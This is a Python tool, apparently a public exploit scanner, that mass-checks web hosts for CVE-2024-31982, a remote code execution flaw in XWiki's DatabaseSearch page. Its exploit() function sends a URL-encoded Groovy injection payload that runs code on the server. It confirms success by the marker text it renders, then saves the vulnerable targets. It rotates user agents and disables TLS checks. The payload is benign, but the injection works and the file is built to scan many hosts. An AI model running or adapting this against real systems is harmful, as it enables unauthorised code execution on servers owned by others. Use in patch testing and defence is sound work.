# cvehunter.py
# Vulnerability detection and exploitation tool for CVE-2024-31982 (XWiki Main/DatabaseSearch remote code execution).
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
import warnings
from fake_useragent import UserAgent
from colorama import Fore, Style
from bs4 import XMLParsedAsHTMLWarning, MarkupResemblesLocatorWarning
from bs4 import BeautifulSoup
import ssl
import httpx
import random
import os
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)

def banner():
    banner = f"""{bold}{random_color}
  ____ __     __ _____  _   _                _
 / ___|\ \   / /| ____|| | | | _   _  _ __  | |_   ___  _ __
| |     \ \ / / |  _|  | |_| || | | || '_ \ | __| / _ \| '__|
| |___   \ V /  | |___ |  _  || |_| || | | || |_ |  __/| |
 \____|   \_/   |_____||_| |_| \__,_||_| |_| \__| \___||_|
                          CVE-2024-31982 {bold}{white}@th3gokul{reset}\n"""
    return banner


print(banner())

parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-31982" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable targets{reset}")
args = parser.parse_args()
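
# Example invocations (illustrative only; the target, list file, and proxy below are placeholders):
#   python3 cvehunter.py -u https://xwiki.example.com -o vulnerable.txt
#   python3 cvehunter.py -l targets.txt -t 10 -proxy http://127.0.0.1:8080 -v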

async def save(result):
    # Append a result line to the chosen output file (results.txt by default).
    try:
        if args.output:
            if os.path.isfile(args.output):
                filename = args.output
            elif os.path.isdir(args.output):
                filename = os.path.join(args.output, "results.txt")
            else:
                filename = args.output
        else:
            filename = "results.txt"
        async with aiofiles.open(filename, "a") as w:
            await w.write(result + '\n')
    except KeyboardInterrupt:
        quit()
    except asyncio.CancelledError:
        raise SystemExit
    except Exception:
        pass
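
# CVE-2024-31982 check: the `text` parameter below is URL-encoded and decodes to
#   }}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}
# which breaks out of the search macro and evaluates Groovy. On a vulnerable XWiki
# instance the marker "Hello from search text:42" is rendered into the page title,
# which is what exploit() looks for.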
async def exploit(session, url, sem, bar):
    try:
        base_url = f'{url}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20'
        header = {
            "User-Agent": UserAgent().random
        }
        async with session.stream("GET", base_url, headers=header, follow_redirects=True, timeout=30) as response:
            response = await response.aread()
            response = response.decode("utf-8")
            with warnings.catch_warnings():
                warnings.filterwarnings("ignore", category=UserWarning)
                warnings.filterwarnings("ignore", category=XMLParsedAsHTMLWarning)
                warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning)
                soup = BeautifulSoup(response, "html.parser", from_encoding="iso-8859-1")
            title_tags = soup.title
            title = title_tags.string if title_tags else ""
            if "Hello from search text:42" in title:
                print(f"{bold}{white}[vuln]: {url}{reset}")
                await save(f"Vulnerable: {base_url}")
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException):
        if args.verbose:
            print(f"[{bold}{red}Timeout{reset}]: {bold}{white}{url}{reset}")
    except ssl.SSLError:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt:
        raise SystemExit
    except asyncio.CancelledError:
        raise SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()
        sem.release()

async def loader(urls, session, sem, bar):
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)
        await asyncio.gather(*tasks, return_exceptions=False)
    except KeyboardInterrupt:
        raise SystemExit
    except asyncio.CancelledError:
        raise SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in loader: {e}, {type(e)}")
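
# Concurrency: a single shared httpx.AsyncClient handles all requests, and a
# BoundedSemaphore sized by --threads caps how many exploit() tasks run at once;
# loader() acquires a slot before scheduling each task and exploit() releases it
# in its finally block.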
async def threads(urls):
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        proxy = args.proxy if args.proxy else None
        async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
            with alive_bar(title="CVEHunter", total=len(urls), enrich_print=False) as bar:
                await loader(urls, session, sem, bar)
    except RuntimeError:
        pass
    except KeyboardInterrupt:
        raise SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in threads: {e}, {type(e)}")

async def main():
    try:
        urls = []
        if args.url:
            # Accept either a full URL or a bare host; for a bare host queue both schemes.
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)
        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)
    except FileNotFoundError:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        raise SystemExit
    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    asyncio.run(main())